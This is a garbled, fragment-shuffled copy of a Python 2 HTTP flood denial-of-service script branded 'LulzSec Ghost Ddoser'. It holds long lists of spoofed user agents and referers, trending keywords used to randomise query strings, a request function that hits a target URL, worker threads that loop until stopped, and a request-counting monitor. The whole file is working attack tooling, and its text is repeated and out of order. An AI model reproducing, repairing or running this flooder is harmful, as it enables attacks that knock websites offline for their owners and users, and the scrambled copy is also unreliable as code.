HTTPThread(threading.Thread):", "Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x')", "keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola')", "global flag flag=val def set_safe(): global safe safe=1 # generates a user agent", "dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)')", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1)", "x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36", "print 'Pra usar python Lulz.py <url>' print 'LulzSec Ghost Ddoser By V3I0p3r' print", "robots.txt and robots meta tags ; http://balihoo.com/index.aspx; robot at balihoo dot com)') headers_useragents.append('BanBots/1.2", "headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel", "headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant", 
"(Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have", "request_counter=0 flag=0 safe=0 def inc_counter(): global request_counter request_counter+=1 def set_flag(val): global flag flag=val", "libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)')", "10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X 10.4.11)')", "headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54", "while flag<2: code=httpcall(url) if (code==800) & (safe==1): set_flag(2) except Exception, ex: pass #", "7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2;", "+ host + '/') return(headers_referers) def bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\")", "/ ( ;|;-./_ _/.-:'o | / ' | / , \\._/_/_./--''/_|:|___|_,' | :", "headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 
Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel", "Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling your site for better indexing on www.axmo.com", "headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix", "(<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy dot com)') headers_useragents.append('Arikus_Spider')", "headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel", "_|/| \\ /-./_ \\; \\ \\,;' \\ ,\\ / \\: `:\\ \\ //", "headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler", "headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') 
headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=')", "Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30')", "headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling your site for better indexing", "Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR", "param_joiner=\"?\" request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent',", "headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized", "com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)')", "keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS Ice Bucket Challenge')", "(+)') headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval", "Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') 
headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback", "(<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de')", "headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac", "Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb;", "feedback at simpy dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine", "headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus", "(+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41')", "A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U;", "headers_useragents.append('GSiteCrawler/v1.20 rev. 
273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1')", "(aicrawler at accoonabot dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001')", "keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas')", "headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)')", "Exception, ex: pass # monitors http threads and counts requests class MonitorThread(threading.Thread): def", "4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus", "like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB", "Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727;", "headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 
4.1; 153x130;", "1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial", "www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484", "# generates a user agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U;", ")') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24')", "acorn at isara dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher v4.xx.x')", "like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3)", "X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22", "`. // // // // ,' / ~~~`.______//____//____//____//_______,'~ // //~ // // ~~", "headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 
260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06", "headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de')", "A Real artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)')", "`'-'--'----'---------' | | : O ._O O_. O ._O O_. ; ; :", "en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko)", "headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22')", "headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows", "request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents))", "headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; 
http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling your site for better", "(Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT", ") /|-._: : | \\ \\ / / :_| ;`-._; __..--'; : :", "(Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0", "en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;') headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1", ".NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0;", "headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)')", "sys.exit() else: inc_counter() urllib2.urlopen(request) return(code) #http caller thread class HTTPThread(threading.Thread): def run(self): try:", "http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko)", "armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610')", "Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;') headers_useragents.append('VS840 4G", "6.3; WOW64) AppleWebKit/537.36 (KHTML, 
like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36", "def set_safe(): global safe safe=1 # generates a user agent array def useragent_list():", "en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux;", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36')", "' : `.`.) _,' |;._:: | | | | `| : `' ,'", "headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727;", "(Version: 1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64')", "(1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0 AVS", "XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev')", "keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi')", "headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') 
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=')", "else: print \"Script Priv8 Privada da LulzSec Ghost\" if len(sys.argv)== 3: if sys.argv[2]==\"safe\":", "2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE", "like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML,", "Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)')", "China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9;", "PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 
4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb;", "5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X", "simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' + host + '/') return(headers_referers) def bots():", "(safe==1): set_flag(2) except Exception, ex: pass # monitors http threads and counts requests", "else: if sys.argv[1]==\"help\": usage() sys.exit() else: print \"Script Priv8 Privada da LulzSec Ghost\"", "print \"Script Priv8 Privada da LulzSec Ghost\" if len(sys.argv)== 3: if sys.argv[2]==\"safe\": set_safe()", "g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux;", "6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64)", "(Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1')", "4.2.1; Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux;", "Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0')", "headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT", "headers_useragents.append('Aberja Checkomat Aberja 
Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona", "1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT", ", \\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------' | | : O ._O O_. O", "(compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')", "~~~ \"\"\" #http request def httpcall(url): useragent_list() referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\" else:", "PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0)", "4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U;", "(Crawler for Balihoo.com search engine - obeys robots.txt and robots meta tags ;", "lULZ Up\" % (request_counter) previous=request_counter if flag==2: print \"\\n -lULZ Finish\" #execute if", "headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like", "sys.exit() else: if sys.argv[1]==\"help\": usage() sys.exit() else: print \"Script Priv8 Privada da LulzSec", "libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS", "/ `'-'--'----'---------' | | : O ._O O_. O ._O O_. 
; ;", "at balihoo dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have", "3.02;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619')", "headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0", "headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0')", "headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)')", "headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport')", "headers_useragents.append('(Privoxy/1.0)') 
headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered", "\"\\a\" print \\ \"\"\" . _____|\\ _.--| LOL |: <____|.----|| .---''---, The ;..__..'", "// // ,' / ~~~`.______//____//____//____//_______,'~ // //~ // // ~~ _// _// _//", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=')", "Flight 370') keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014", "global safe safe=1 # generates a user agent array def useragent_list(): global headers_useragents", "Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U;", "/ | \\ \\ _|/| \\ /-./_ \\; \\ \\,;' \\ ,\\ /", "inc_counter() urllib2.urlopen(request) return(code) #http caller thread class HTTPThread(threading.Thread): def run(self): try: while flag<2:", "(Linux; U; Android 4.1.2; 
en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator')", "FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html;", "Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us;", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') 